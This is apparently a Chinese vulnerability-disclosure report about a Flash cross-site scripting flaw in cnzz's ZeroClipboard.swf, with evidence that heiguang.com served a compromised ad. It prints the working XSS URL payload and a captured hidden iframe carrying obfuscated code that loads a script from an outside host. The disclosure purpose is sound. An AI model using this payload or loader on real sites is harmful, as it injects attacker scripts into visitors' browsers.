2013-11-18: 细节已通知厂商并且等待厂商处理中 2013-11-18: 厂商已经确认,细节仅向厂商公开 2013-11-28: 细节向核心白帽子及相关领域专家公开 2013-12-08: 细节向普通白帽子公开 2013-12-18: 细节向实习白帽子公开 2014-01-02: 细节向公众公开
cnzz一处flash跨站+黑光网疑似被入侵
赶集网云监控再次立功监控到的flash xss点http://adm.cnzz.com/js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height调用flash的站点,黑光网
GET /js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height HTTP/1.1Host: adm.cnzz.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-alive^MReferer: http://www.heiguang.com/
http://js.adm.cnzz.net/atos.php?sid=194947&width=1366&height=768&isf=1&domain=&proid=&pid=&fid=&mid=&floorid=&time=1384741937392392&referer=&href=http%3A%2F%2Fwww.heiguang.com%2F
(function(){var servertime = +new Date();window['starttime_194947']&&(window['totaltime_194947']=servertime-window['starttime_194947']);})();(function(){(function(url){var url=url;function R(name,fn){return window[name]?window[name]:window[name]=fn;}R('errorLoad',function(obj,id){var sid=arguments[1],nowtime=+new Date(),alltime,turl;turl=url+"?sid="+id+"&iurl="+(encodeURIComponent(obj.src)||'')+"&type=img&loadtime=-1";if(cnzz_request){setTimeout(function(){cnzz_request(turl);},0);}});})("http://action.adm.cnzz.net/bench.gif");function jsLoaded(d,o){var a,d=d;return d?(a=window.adloaded=window.adloaded||[],o&&1==o?(a["load_"+d]=a["load_"+d]||0,a["load_"+d]=1,void 0):(a["load_"+d]=a["load_"+d]||0,a["load_"+d])):1}if(("function" == typeof jsLoaded)&&jsLoaded(194947)){return false;}function showAd(b,a,c){c=="iframe"?a&&1==a.nodeType?iframeout(b||{},a):document.write(b.data||""):a&&1==a.nodeType?window.setTimeout(function(){a.insertAdjacentHTML("afterBegin",b)},0):document.write(b);return!0};function html(a,b){var c="",f=a.adtype||"",d=a.width||0,e=a.height||0,c=a.data;a.config.originaltype=="rich"&&(b=null);if(b&&1==b.nodeType)b.style.cssText=b.style.cssText+(d>=0?";width:"+d+"px;":"")+(e>=0?";height:"+e+"px;":"");if(!c)return!1;showAd(c,b,f)};html({"id":194947,"data":"<iframe width=0 height=0 src=http:\/\/adm.cnzz.com\/js\/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);\/\/&width&height name=\"window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,122,104,117,103,101,115,102,46,99,111,109,47,120,120,47,111,90,83);document.body.appendChild(window.s)\"><\/iframe><DIV id=\"cnzz\" style=\"display:none\"><script type=\"text\/javascript\">var cnzz_protocol = ((\"https:\" == document.location.protocol) ? \" https:\/\/\" : \" http:\/\/\");document.write(unescape(\"%3Cspan id='cnzz_stat_icon_5702888'%3E%3C\/span%3E%3Cscript src='\" + cnzz_protocol + \"s9.cnzz.com\/stat.php%3Fid%3D5702888' type='text\/javascript'%3E%3C\/script%3E\"));<\/script><\/div>","adtype":"rich","width":"-1","height":"-1","config":{"height":"-1","width":"-1","originaltype":"rich"}},document.getElementById("cnzz_fixedslot_ad_194947"));"function" == typeof jsLoaded && (jsLoaded(194947,1));})();
是对不蛤蛤李菊福
危害等级:中
漏洞Rank:10
确认时间:2013-11-18 14:43
非常感谢,我们正在修复
暂无